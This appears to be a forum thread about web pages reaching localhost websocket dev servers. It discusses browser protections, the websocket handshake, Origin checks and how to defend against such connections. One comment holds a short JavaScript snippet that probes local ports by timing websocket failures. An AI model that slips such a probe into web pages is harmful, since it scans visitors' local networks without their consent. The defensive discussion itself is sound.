I threw the code together last night. It's running on cloudflare backed by an S3 static file, so shouldn't be capacity issues

It was only tested on Firefox, as a basic proof-of-concept. AIUI, chrome et al offer similar functionality but maybe the API is different

It may also take a few minutes to find and connect to the websocket, I think CRA webserver maybe only binds to one client at a time, so maybe it would pick up the connection after a webpack-dev-server reload or two.


Interesting, history repeats. Didn't browsers implement firewalls a while ago to prevent arbitrary requests? I remember doing things like CSRF attacks on SMTP, POP (any text-based protocol, basically) and stuff like that long ago, but Firefox added mitigations to prevent connections to certain ports. I guess that browser firewall feature could be used as a mitigation to prevent these attacks.


Forget port scanning for a sec. Couldn't you just scan the whole local network for common vulnerabilities, like any old virus would?


You can only make a websockets request. The JavaScript call will fail if either the port is closed, or the port is open but doesn't act like a websockets server. So you can tell if a port is open by the time it takes for the connection to fail. If it's actually a websockets server you hit, then you might get a usable bidirectional communication channel to it.
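
A minimal sketch of that timing check (the target is a placeholder; the thresholds are browser- and network-dependent):

    function probePort(host, port) {
        return new Promise((resolve) => {
            const start = Date.now();
            const ws = new WebSocket(`ws://${host}:${port}`);
            // How long the failure takes differs between closed, filtered, and
            // open-but-not-a-websocket-server ports; onopen means a real websocket server.
            ws.onerror = () => resolve({ open: false, ms: Date.now() - start });
            ws.onopen = () => { ws.close(); resolve({ open: true, ms: Date.now() - start }); };
        });
    }

    probePort('127.0.0.1', 8081).then((r) => console.log(r));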


I can still attack your local non-http-servers with a regular <form> post, e.g. something like http://bugs.proftpd.org/show_bug.cgi?id=4143

With Websockets something like this is effectively not possible, because WebSockets were designed with this in mind

- A browser will only start transmitting data over the ws once the handshake is done. So just making a request has very limited ways for an attacker to transmit user defined data (basically the Host header/Origin header and cookies... which will not really work as an attack vector for newline-delimited or binary protocols)

- The handshake itself works by the client sending a nonce to the server, which the server then has to hash together with a special UUID (a sketch of this step follows the list). Only actual websocket servers know how to do this step correctly, and thus the browser will refuse to even open connections to servers which aren't actual websocket servers. So the attacker will not be able to send truly arbitrary data or read any responses.

- Even after the handshake, browser-to-server data is masked by XORing the data with browser-picked keys. The attacker therefore cannot control what the data will end up looking like when it is sent to the server. And unaware servers will certainly not try to reverse the XORing.
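
For reference, the accept-key computation from the handshake step above looks roughly like this in Node (the key value is the RFC 6455 example; the GUID is fixed by the spec):

    const crypto = require('crypto');

    const clientKey = 'dGhlIHNhbXBsZSBub25jZQ=='; // Sec-WebSocket-Key sent by the browser
    const MAGIC_GUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11';

    const accept = crypto.createHash('sha1')
        .update(clientKey + MAGIC_GUID)
        .digest('base64');

    // The server must echo this back as Sec-WebSocket-Accept;
    // a non-websocket server won't know to do that, so the browser aborts.
    console.log(accept); // s3pPLMBiTxaQ9kYGzzhZRbK+xOo=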

What you're left with regarding websockets are timing attacks to do some port and network scanning, and attacking actual websocket servers which do not check the Origin or use some kind of token to verify incoming connections, analogous to attackable regular HTTP endpoints that don't handle auth and CSRF tokens properly.

I'll readily admit, though, that a lot of developers forget about verifying incoming websocket connections. I have fucked this up myself in the past, and I have found such issues in other websites, including one problem that let me take over user accounts via an unsecured websocket if I was able to get such users to open an attack website (or ad).


> browsers allow websockets from public origins to open websockets connections to localhost without many protections

Excuse me, but what in the world? XHR has all kinds of cross-site request protections that even make developing apps locally a pain. How come websockets don't come with such protections?

Are there apps that take over this responsibility?


It strikes me that this is most likely to be used as part of an exfiltration mechanism for a malicious JS package or similar.


I'm assuming this can be mitigated by using SSL/TLS. Have a read over at https://crossbar.io/docs/Secure-WebSocket-and-HTTPS/ - Not sure how you would do certificate pinning though.


I don't see what WSS would do to stop the local websockets dev server from serving a remote client. A remote client could just accept the connection without verifying the signature, yes?


That's why I mentioned certificate pinning. I figure you could generate a keypair for WSS communications between the nice programs and then when a nice client tried to connect to a naughty server he would know he had connected to a different host program.


Can't you use CSRF to protect against this?

https://dev.solita.fi/2018/11/07/securing-websocket-endpoint...


If you use uBlock Origin, you can prevent any connections to localhost by default.


interesting, but I do not get it:

"you can", or is it blocked by default?


It's worth noting that secrets rarely live in front-end code, specifically because it's impossible to prevent people from extracting them.


Are there any extensions to block connections to localhost from code on other interfaces or origins?


I was wondering the same: I would be interested in an extension that tells me when a website tries to connect to localhost (it should not be hard). Then, once I know it, I would just react myself, as in the cited https://nullsweep.com/why-is-this-website-port-scanning-me/


After ~10 minutes I get: "Connected to 0 servers"

Ahh, feels so good


When I disable websockets with network.websocket.max-connections = 0, WhatsApp Web doesn't work, so perhaps someone could develop a related attack here?


Is webpack-dev-server planning on fixing this?


This is why you use VMs with their own network interfaces to do development in


Is the TL;DR here just "webpack-dev server doesn't verify Origin headers for hot reloading?"

Is there a whole group of people that are just learning about Websockets for the first time?



